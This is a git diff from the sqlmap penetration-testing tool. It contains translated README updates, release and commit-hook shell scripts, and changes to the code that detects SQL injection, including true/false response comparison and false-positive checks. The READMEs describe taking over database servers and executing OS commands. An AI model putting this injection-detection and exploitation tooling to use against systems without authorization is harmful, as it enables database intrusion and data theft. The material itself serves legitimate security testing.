* メーリングリストのアーカイブ: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,5 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||
|
||||
@@ -33,7 +34,7 @@ Para obter a lista completa de opções faça:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217).
|
||||
Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601).
|
||||
Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Links
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
||||
|
||||
@@ -37,7 +37,7 @@ Bütün seçenekleri gösterir
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Program ile ilgili örnekleri [burada](https://gist.github.com/stamparm/5335217) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
|
||||
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
|
||||
|
||||
Links
|
||||
----
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||
|
||||
@@ -33,7 +33,7 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||
你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||
|
||||
链接
|
||||
----
|
||||
|
||||
@@ -99,7 +99,7 @@ void usage(char *path)
|
||||
printf(" -h this screen\n");
|
||||
printf(" -b num maximal number of blanks (unanswered icmp requests)\n");
|
||||
printf(" before quitting\n");
|
||||
printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
|
||||
printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
|
||||
printf("In order to improve the speed, lower the delay (-d) between requests or\n");
|
||||
printf("increase the size (-s) of the data buffer\n");
|
||||
}
|
||||
@@ -203,8 +203,6 @@ int main(int argc, char **argv)
|
||||
PROCESS_INFORMATION pi;
|
||||
int status;
|
||||
unsigned int max_data_size;
|
||||
struct hostent *he;
|
||||
|
||||
|
||||
// set defaults
|
||||
target = 0;
|
||||
|
||||
23
extra/shutils/postcommit-hook.sh
Normal file
23
extra/shutils/postcommit-hook.sh
Normal file
@@ -0,0 +1,23 @@
|
||||
#!/bin/bash
|
||||
|
||||
SETTINGS="../../lib/core/settings.py"
|
||||
|
||||
declare -x SCRIPTPATH="${0}"
|
||||
|
||||
FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
|
||||
|
||||
if [ -f $FULLPATH ]
|
||||
then
|
||||
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"')
|
||||
declare -a LINE
|
||||
NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
|
||||
if [ -n "$NEW_TAG" ]
|
||||
then
|
||||
git commit -am "Automatic monthly tagging"
|
||||
echo "Creating new tag ${NEW_TAG}"
|
||||
git tag $NEW_TAG
|
||||
git push origin $NEW_TAG
|
||||
echo "Going to push PyPI package"
|
||||
/bin/bash ${SCRIPTPATH%/*}/pypi.sh
|
||||
fi
|
||||
fi
|
||||
30
extra/shutils/precommit-hook.sh
Normal file
30
extra/shutils/precommit-hook.sh
Normal file
@@ -0,0 +1,30 @@
|
||||
#!/bin/bash
|
||||
|
||||
PROJECT="../../"
|
||||
SETTINGS="../../lib/core/settings.py"
|
||||
CHECKSUM="../../txt/checksum.md5"
|
||||
|
||||
declare -x SCRIPTPATH="${0}"
|
||||
|
||||
PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT
|
||||
SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
|
||||
CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM
|
||||
|
||||
if [ -f $SETTINGS_FULLPATH ]
|
||||
then
|
||||
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
|
||||
declare -a LINE
|
||||
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
||||
if [ -n "$INCREMENTED" ]
|
||||
then
|
||||
sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
|
||||
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}"
|
||||
else
|
||||
echo "Something went wrong in VERSION increment"
|
||||
exit 1
|
||||
fi
|
||||
git add "$SETTINGS_FULLPATH"
|
||||
fi
|
||||
|
||||
truncate -s 0 "$CHECKSUM_FULLPATH"
|
||||
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
|
||||
177
extra/shutils/pypi.sh
Normal file
177
extra/shutils/pypi.sh
Normal file
@@ -0,0 +1,177 @@
|
||||
#!/bin/bash
|
||||
|
||||
declare -x SCRIPTPATH="${0}"
|
||||
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
|
||||
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
|
||||
TYPE=pip
|
||||
TMP_DIR=/tmp/pypi
|
||||
mkdir $TMP_DIR
|
||||
cd $TMP_DIR
|
||||
cat > $TMP_DIR/setup.py << EOF
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from setuptools import setup, find_packages
|
||||
|
||||
setup(
|
||||
name='sqlmap',
|
||||
version='$VERSION',
|
||||
description="Automatic SQL injection and database takeover tool",
|
||||
author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
|
||||
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
|
||||
url='https://sqlmap.org',
|
||||
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
|
||||
license='GNU General Public License v2 (GPLv2)',
|
||||
packages=find_packages(),
|
||||
include_package_data=True,
|
||||
zip_safe=False,
|
||||
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
|
||||
classifiers=[
|
||||
'Development Status :: 5 - Production/Stable',
|
||||
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
|
||||
'Natural Language :: English',
|
||||
'Operating System :: OS Independent',
|
||||
'Programming Language :: Python',
|
||||
'Environment :: Console',
|
||||
'Topic :: Database',
|
||||
'Topic :: Security',
|
||||
],
|
||||
entry_points={
|
||||
'console_scripts': [
|
||||
'sqlmap = sqlmap.sqlmap:main',
|
||||
],
|
||||
},
|
||||
)
|
||||
EOF
|
||||
wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip
|
||||
unzip sqlmap.zip
|
||||
rm sqlmap.zip
|
||||
mv "sqlmap-$VERSION" sqlmap
|
||||
cat > sqlmap/__init__.py << EOF
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
EOF
|
||||
cat > README.rst << "EOF"
|
||||
sqlmap
|
||||
======
|
||||
|
||||
|Build Status| |Python 2.6|2.7| |License| |Twitter|
|
||||
|
||||
sqlmap is an open source penetration testing tool that automates the
|
||||
process of detecting and exploiting SQL injection flaws and taking over
|
||||
of database servers. It comes with a powerful detection engine, many
|
||||
niche features for the ultimate penetration tester and a broad range of
|
||||
switches lasting from database fingerprinting, over data fetching from
|
||||
the database, to accessing the underlying file system and executing
|
||||
commands on the operating system via out-of-band connections.
|
||||
|
||||
Screenshots
|
||||
-----------
|
||||
|
||||
.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png
|
||||
:alt: Screenshot
|
||||
|
||||
|
||||
You can visit the `collection of
|
||||
screenshots <https://github.com/sqlmapproject/sqlmap/wiki/Screenshots>`__
|
||||
demonstrating some of features on the wiki.
|
||||
|
||||
Installation
|
||||
------------
|
||||
|
||||
You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: ::
|
||||
|
||||
pip install --upgrade sqlmap
|
||||
|
||||
Alternatively, you can download the latest tarball by clicking
|
||||
`here <https://github.com/sqlmapproject/sqlmap/tarball/master>`__ or
|
||||
latest zipball by clicking
|
||||
`here <https://github.com/sqlmapproject/sqlmap/zipball/master>`__.
|
||||
|
||||
If you prefer fetching daily updates, you can download sqlmap by cloning the
|
||||
`Git <https://github.com/sqlmapproject/sqlmap>`__ repository:
|
||||
|
||||
::
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap works out of the box with
|
||||
`Python <http://www.python.org/download/>`__ version **2.6.x** and
|
||||
**2.7.x** on any platform.
|
||||
|
||||
Usage
|
||||
-----
|
||||
|
||||
To get a list of basic options and switches use:
|
||||
|
||||
::
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
To get a list of all options and switches use:
|
||||
|
||||
::
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
You can find a sample run `here <https://asciinema.org/a/46601>`__. To
|
||||
get an overview of sqlmap capabilities, list of supported features and
|
||||
description of all options and switches, along with examples, you are
|
||||
advised to consult the `user's
|
||||
manual <https://github.com/sqlmapproject/sqlmap/wiki>`__.
|
||||
|
||||
Links
|
||||
-----
|
||||
|
||||
- Homepage: http://sqlmap.org
|
||||
- Download:
|
||||
`.tar.gz <https://github.com/sqlmapproject/sqlmap/tarball/master>`__
|
||||
or `.zip <https://github.com/sqlmapproject/sqlmap/zipball/master>`__
|
||||
- Commits RSS feed:
|
||||
https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
- Frequently Asked Questions (FAQ):
|
||||
https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
- Mailing list subscription:
|
||||
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
- Mailing list RSS feed:
|
||||
http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
- Mailing list archive:
|
||||
http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
- Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
- Demos: http://www.youtube.com/user/inquisb/videos
|
||||
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master
|
||||
:target: https://api.travis-ci.org/sqlmapproject/sqlmap
|
||||
.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
|
||||
:target: https://www.python.org/
|
||||
.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
|
||||
:target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
|
||||
.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
|
||||
:target: https://twitter.com/sqlmap
|
||||
|
||||
.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md
|
||||
.. http://rst.ninjs.org/
|
||||
EOF
|
||||
sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
|
||||
sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
|
||||
sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1` lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5
|
||||
for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
|
||||
python setup.py sdist upload
|
||||
rm -rf $TMP_DIR
|
||||
@@ -48,9 +48,6 @@ def action():
|
||||
elif kb.nullConnection:
|
||||
errMsg += ". You can try to rerun without using optimization "
|
||||
errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
|
||||
else:
|
||||
errMsg += ". Support for this DBMS will be implemented at "
|
||||
errMsg += "some point"
|
||||
|
||||
raise SqlmapUnsupportedDBMSException(errMsg)
|
||||
|
||||
|
||||
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
import copy
|
||||
import httplib
|
||||
import random
|
||||
import re
|
||||
import socket
|
||||
import time
|
||||
@@ -54,6 +55,7 @@ from lib.core.enums import HASHDB_KEYS
|
||||
from lib.core.enums import HEURISTIC_TEST
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import NOTE
|
||||
from lib.core.enums import NULLCONNECTION
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.enums import PLACE
|
||||
@@ -62,14 +64,15 @@ from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import CLOUDFLARE_SERVER_HEADER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
||||
from lib.core.settings import FI_ERROR_REGEX
|
||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
||||
from lib.core.settings import IDS_WAF_CHECK_RATIO
|
||||
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
|
||||
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
|
||||
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
|
||||
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
||||
from lib.core.settings import SUPPORTED_DBMS
|
||||
@@ -77,6 +80,7 @@ from lib.core.settings import URI_HTTP_HEADER
|
||||
from lib.core.settings import UPPER_RATIO_BOUND
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
from lib.request.connect import Connect as Request
|
||||
from lib.request.comparison import comparison
|
||||
from lib.request.inject import checkBooleanExpression
|
||||
from lib.request.templates import getPageTemplate
|
||||
from lib.techniques.union.test import unionTest
|
||||
@@ -97,6 +101,9 @@ def checkSqlInjection(place, parameter, value):
|
||||
tests = getSortedInjectionTests()
|
||||
seenPayload = set()
|
||||
|
||||
kb.data.setdefault("randomInt", str(randomInt(10)))
|
||||
kb.data.setdefault("randomStr", str(randomStr(10)))
|
||||
|
||||
while tests:
|
||||
test = tests.pop(0)
|
||||
|
||||
@@ -173,10 +180,11 @@ def checkSqlInjection(place, parameter, value):
|
||||
lower, upper = int(match.group(1)), int(match.group(2))
|
||||
for _ in (lower, upper):
|
||||
if _ > 1:
|
||||
__ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
|
||||
unionExtended = True
|
||||
test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns)
|
||||
title = re.sub(r"\b%d\b" % _, str(2 * _), title)
|
||||
test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title)
|
||||
test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
|
||||
title = re.sub(r"\b%d\b" % _, str(__), title)
|
||||
test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
|
||||
|
||||
# Skip test if the user's wants to test only for a specific
|
||||
# technique
|
||||
@@ -380,8 +388,6 @@ def checkSqlInjection(place, parameter, value):
|
||||
# Use different page template than the original
|
||||
# one as we are changing parameters value, which
|
||||
# will likely result in a different content
|
||||
kb.data.setdefault("randomInt", str(randomInt(10)))
|
||||
kb.data.setdefault("randomStr", str(randomStr(10)))
|
||||
|
||||
if conf.invalidLogical:
|
||||
_ = int(kb.data.randomInt[:2])
|
||||
@@ -441,11 +447,13 @@ def checkSqlInjection(place, parameter, value):
|
||||
kb.matchRatio = None
|
||||
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
|
||||
Request.queryPage(genCmpPayload(), place, raise404=False)
|
||||
falsePage = threadData.lastComparisonPage or ""
|
||||
falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
|
||||
falseRawResponse = "%s%s" % (falseHeaders, falsePage)
|
||||
|
||||
# Perform the test's True request
|
||||
trueResult = Request.queryPage(reqPayload, place, raise404=False)
|
||||
truePage = threadData.lastComparisonPage or ""
|
||||
truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
|
||||
trueRawResponse = "%s%s" % (trueHeaders, truePage)
|
||||
|
||||
if trueResult and not(truePage == falsePage and not kb.nullConnection):
|
||||
# Perform the test's False request
|
||||
@@ -460,24 +468,59 @@ def checkSqlInjection(place, parameter, value):
|
||||
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
||||
if errorResult:
|
||||
continue
|
||||
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
||||
if _ > kb.matchRatio:
|
||||
kb.matchRatio = _
|
||||
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
||||
|
||||
injectable = True
|
||||
|
||||
if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable:
|
||||
trueSet = set(extractTextTagContent(truePage))
|
||||
falseSet = set(extractTextTagContent(falsePage))
|
||||
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
||||
if injectable:
|
||||
if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||
if all((falseCode, trueCode)) and falseCode != trueCode:
|
||||
conf.code = trueCode
|
||||
|
||||
if candidates:
|
||||
conf.string = candidates[0]
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --code=%d)" % (paramType, parameter, title, conf.code)
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
trueSet = set(extractTextTagContent(trueRawResponse))
|
||||
trueSet = trueSet.union(__ for _ in trueSet for __ in _.split())
|
||||
|
||||
falseSet = set(extractTextTagContent(falseRawResponse))
|
||||
falseSet = falseSet.union(__ for _ in falseSet for __ in _.split())
|
||||
|
||||
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet)))
|
||||
|
||||
if candidates:
|
||||
candidates = sorted(candidates, key=lambda _: len(_))
|
||||
for candidate in candidates:
|
||||
if re.match(r"\A\w+\Z", candidate):
|
||||
break
|
||||
|
||||
conf.string = candidate
|
||||
|
||||
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not any((conf.string, conf.notString)):
|
||||
candidates = filter(None, (_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet)))
|
||||
|
||||
if candidates:
|
||||
candidates = sorted(candidates, key=lambda _: len(_))
|
||||
for candidate in candidates:
|
||||
if re.match(r"\A\w+\Z", candidate):
|
||||
break
|
||||
|
||||
conf.notString = candidate
|
||||
|
||||
infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % (paramType, parameter, title, repr(conf.notString).lstrip('u').strip("'"))
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not any((conf.string, conf.notString, conf.code)):
|
||||
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
||||
# In case of error-based SQL injection
|
||||
elif method == PAYLOAD.METHOD.GREP:
|
||||
# Perform the test's request and grep the response
|
||||
@@ -518,7 +561,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
||||
|
||||
if trueResult:
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
@@ -538,7 +581,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
warnMsg = "using unescaped version of the test "
|
||||
warnMsg += "because of zero knowledge of the "
|
||||
warnMsg += "back-end DBMS. You can try to "
|
||||
warnMsg += "explicitly set it using option '--dbms'"
|
||||
warnMsg += "explicitly set it with option '--dbms'"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
else:
|
||||
Backend.forceDbms(kb.heuristicDbms)
|
||||
@@ -627,6 +670,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
|
||||
injection.conf.textOnly = conf.textOnly
|
||||
injection.conf.titles = conf.titles
|
||||
injection.conf.code = conf.code
|
||||
injection.conf.string = conf.string
|
||||
injection.conf.notString = conf.notString
|
||||
injection.conf.regexp = conf.regexp
|
||||
@@ -691,19 +735,20 @@ def checkSqlInjection(place, parameter, value):
|
||||
# Return the injection object
|
||||
if injection.place is not None and injection.parameter is not None:
|
||||
if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):
|
||||
warnMsg = "in OR boolean-based injections, please consider usage "
|
||||
warnMsg = "in OR boolean-based injection cases, please consider usage "
|
||||
warnMsg += "of switch '--drop-set-cookie' if you experience any "
|
||||
warnMsg += "problems during data retrieval"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
injection = checkFalsePositives(injection)
|
||||
|
||||
if not injection:
|
||||
if not checkFalsePositives(injection):
|
||||
kb.vulnHosts.remove(conf.hostname)
|
||||
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
|
||||
injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
|
||||
|
||||
else:
|
||||
injection = None
|
||||
|
||||
if injection:
|
||||
if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
|
||||
checkSuhosinPatch(injection)
|
||||
checkFilteredChars(injection)
|
||||
|
||||
@@ -748,7 +793,7 @@ def checkFalsePositives(injection):
|
||||
Checks for false positives (only in single special cases)
|
||||
"""
|
||||
|
||||
retVal = injection
|
||||
retVal = True
|
||||
|
||||
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
|
||||
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
||||
@@ -774,7 +819,7 @@ def checkFalsePositives(injection):
|
||||
break
|
||||
|
||||
if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
|
||||
retVal = None
|
||||
retVal = False
|
||||
break
|
||||
|
||||
# Just in case if DBMS hasn't properly recovered from previous delayed request
|
||||
@@ -782,22 +827,22 @@ def checkFalsePositives(injection):
|
||||
checkBooleanExpression("%d=%d" % (randInt1, randInt2))
|
||||
|
||||
if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): # this must not be evaluated to True
|
||||
retVal = None
|
||||
retVal = False
|
||||
break
|
||||
|
||||
elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): # this must not be evaluated to True
|
||||
retVal = None
|
||||
retVal = False
|
||||
break
|
||||
|
||||
elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): # this must be evaluated to True
|
||||
retVal = None
|
||||
retVal = False
|
||||
break
|
||||
|
||||
elif checkBooleanExpression("%d %d" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement)
|
||||
retVal = None
|
||||
retVal = False
|
||||
break
|
||||
|
||||
if retVal is None:
|
||||
if not retVal:
|
||||
warnMsg = "false positive or unexploitable injection point detected"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -885,6 +930,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
kb.heuristicPage = page
|
||||
kb.heuristicMode = False
|
||||
|
||||
parseFilePaths(page)
|
||||
@@ -906,7 +952,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
|
||||
if not result:
|
||||
randStr = randomStr()
|
||||
payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix)
|
||||
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
|
||||
casting = Request.queryPage(payload, place, raise404=False)
|
||||
|
||||
@@ -947,7 +993,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
|
||||
logger.info(infoMsg)
|
||||
|
||||
for match in re.finditer("(?i)[^\n]*(no such file|failed (to )?open)[^\n]*", page or ""):
|
||||
for match in re.finditer(FI_ERROR_REGEX, page or ""):
|
||||
if randStr1.lower() in match.group(0).lower():
|
||||
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
|
||||
